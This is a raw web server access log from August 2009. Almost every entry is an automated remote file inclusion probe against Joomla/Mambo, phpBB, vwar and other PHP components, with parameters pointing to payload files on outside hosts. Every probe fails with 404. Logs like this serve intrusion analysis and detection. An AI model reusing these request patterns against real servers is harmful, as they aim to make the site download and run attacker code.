74.53.201.178 - - [03/Aug/2009:04:28:17 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:28:27 -0400] "GET /administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:28:27 -0400] "GET /logs/administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:28:27 -0400] "GET /logs/access_log.Q109060600/administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:28:32 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:28:39 -0400] "GET /administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:28:43 -0400] "GET /logs/administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.53.201.178 - - [03/Aug/2009:04:28:43 -0400] "GET /logs/access_log.Q109060600%20%20/administrator/components/com_juser/export_table_data_xls.php?mosConfig_absolute_path=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.119.154.129 - - [03/Aug/2009:04:28:46 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
209.59.12.99 - - [03/Aug/2009:04:28:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.122.197.50 - - [03/Aug/2009:04:30:05 -0400] "GET /logs/access_log.Q109051300%20%20//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:22 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:22 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:22 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:23 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:23 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:23 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:23 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:23 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:23 -0400] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:25 -0400] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:25 -0400] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:25 -0400] "GET /logs/access_log.Q109070300%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:28 -0400] "GET /logs/access_log.Q109051000%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.191.102.117 - - [03/Aug/2009:04:30:29 -0400] "GET /logs/access_log.Q109051000%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.122.197.50 - - [03/Aug/2009:04:31:06 -0400] "GET /logs/access_log.Q109071300%20%20//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.122.158.207 - - [03/Aug/2009:04:31:10 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.122.158.207 - - [03/Aug/2009:04:31:10 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
116.122.158.207 - - [03/Aug/2009:04:31:10 -0400] "GET /logs/access_log.Q109072500%20%20//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
116.122.158.207 - - [03/Aug/2009:04:31:48 -0400] "GET /logs/error_log.Q109071500%20%20//bbs/skin/ggambo7002_board/comment_modify.php?dir=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.119.154.129 - - [03/Aug/2009:04:32:02 -0400] "GET /logs/access_log.Q109052300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
85.119.154.129 - - [03/Aug/2009:04:32:02 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
85.119.154.129 - - [03/Aug/2009:04:32:03 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:04:32:17 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:04:32:17 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [03/Aug/2009:04:32:17 -0400] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:04:32:26 -0400] "GET /logs/access_log.Q109053100/administrator/components/errors.php?error=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:04:32:26 -0400] "GET /logs/access_log.Q109053100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:04:32:27 -0400] "GET /administrator/components/errors.php?error=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:04:32:27 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:04:32:27 -0400] "GET /logs/administrator/components/errors.php?error=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:04:32:27 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
213.149.105.8 - - [03/Aug/2009:04:32:50 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/ggamboskin_setup.php.dir=http://www.giandomenicolombardi.it/listing/exploit/fx29id.txt? HTTP/1.1" 404 339 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:04:33:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.119.154.129 - - [03/Aug/2009:04:34:11 -0400] "GET /logs/error_log.Q109052300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lines.it///id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
66.244.128.29 - - [03/Aug/2009:04:34:15 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bastel-gianni.ch/stats/id???? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.244.128.29 - - [03/Aug/2009:04:34:15 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bastel-gianni.ch/stats/id???? HTTP/1.1" 404 253 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
64.34.176.211 - - [03/Aug/2009:04:34:43 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.143.240.203 - - [03/Aug/2009:04:34:45 -0400] "GET /logs/access_log.Q109070800/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
174.143.240.203 - - [03/Aug/2009:04:34:45 -0400] "GET /logs/access_log.Q109070800/administrator/components/errors.php?error=http://mp3dolls.dp.ua/config/bajocdm2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
64.34.176.211 - - [03/Aug/2009:04:34:47 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:04:34:47 -0400] "GET /logs/access_log.Q109061900%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.34.176.211 - - [03/Aug/2009:04:35:31 -0400] "GET /logs/access_log.Q109062900%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
94.23.5.213 - - [03/Aug/2009:04:35:56 -0400] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bastel-gianni.ch/stats/id???? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.23.5.213 - - [03/Aug/2009:04:35:56 -0400] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://bastel-gianni.ch/stats/id???? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
222.122.197.50 - - [03/Aug/2009:04:36:45 -0400] "GET /logs/access_log.Q109071300//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.197.50 - - [03/Aug/2009:04:37:10 -0400] "GET /logs/access_log.Q109071300//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.32.69.162 - - [03/Aug/2009:04:37:17 -0400] "GET /logs/access_log.Q109061900//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
72.32.69.162 - - [03/Aug/2009:04:37:17 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
72.32.69.162 - - [03/Aug/2009:04:37:17 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
74.53.70.114 - - [03/Aug/2009:04:37:19 -0400] "GET ///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
74.53.70.114 - - [03/Aug/2009:04:37:19 -0400] "GET /logs///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
74.53.70.114 - - [03/Aug/2009:04:37:19 -0400] "GET /logs/access_log.Q109051900///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.32.69.162 - - [03/Aug/2009:04:37:48 -0400] "GET /logs/access_log.Q109062900//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.detkreativeselskab.dk/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
209.172.33.230 - - [03/Aug/2009:04:37:49 -0400] "GET /logs/access_log.Q109061900//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:04:37:49 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 217 "-" "libwww-perl/5.812"
209.172.33.230 - - [03/Aug/2009:04:37:49 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
91.121.83.177 - - [03/Aug/2009:04:38:07 -0400] "GET ///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:38:07 -0400] "GET /logs///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:38:07 -0400] "GET /logs/access_log.Q109051900///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:38:07 -0400] "GET ///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:38:07 -0400] "GET /logs///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:38:07 -0400] "GET /logs/access_log.Q109051900///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:04:38:15 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:04:38:15 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.125.35.18 - - [03/Aug/2009:04:38:16 -0400] "GET /logs/access_log.Q109061900%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.internetfoto.se/libraries/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.172.33.230 - - [03/Aug/2009:04:38:17 -0400] "GET /logs/access_log.Q109062900//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.bu.ac.th/en/hotnews/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.812"
222.122.197.50 - - [03/Aug/2009:04:38:33 -0400] "GET /logs/access_log.Q109051300%20%20//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [03/Aug/2009:04:38:35 -0400] "GET /logs/access_log.Q109051900%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.23.5.213 - - [03/Aug/2009:04:38:40 -0400] "GET //modules/mods_full/shopping_cart/includes/errors.php?error=http://bastel-gianni.ch/stats/id???? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.23.5.213 - - [03/Aug/2009:04:38:40 -0400] "GET /logs//modules/mods_full/shopping_cart/includes/errors.php?error=http://bastel-gianni.ch/stats/id???? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
222.122.197.50 - - [03/Aug/2009:04:38:42 -0400] "GET /logs/access_log.Q109071300//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:04:38:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.53.70.114 - - [03/Aug/2009:04:39:00 -0400] "GET /logs/access_log.Q109071300%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:40:00 -0400] "GET /logs/access_log.Q109051900%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.197.50 - - [03/Aug/2009:04:40:00 -0400] "GET /logs/access_log.Q109071300%20%20//index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:40:00 -0400] "GET /logs/access_log.Q109051900%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:04:40:29 -0400] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:04:40:29 -0400] "GET /logs/access_log.Q109061900//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:04:40:29 -0400] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:40:37 -0400] "GET /logs/access_log.Q109071300%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.15 - - [03/Aug/2009:04:40:40 -0400] "GET /logs/access_log.Q109062900//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delawarepokernews.com/images/baner.jpg?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.83.177 - - [03/Aug/2009:04:40:46 -0400] "GET /logs/access_log.Q109071300%20%20///index.php?option=com_login&task=blogcategory&id=0&Itemid=55/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.111.165.164 - - [03/Aug/2009:04:40:58 -0400] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.111.165.164 - - [03/Aug/2009:04:40:58 -0400] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
65.111.165.164 - - [03/Aug/2009:04:40:58 -0400] "GET /logs/access_log.Q109052400%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
65.111.165.164 - - [03/Aug/2009:04:40:59 -0400] "GET /logs/access_log.Q109060300%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
74.53.70.114 - - [03/Aug/2009:04:41:38 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
74.53.70.114 - - [03/Aug/2009:04:41:38 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
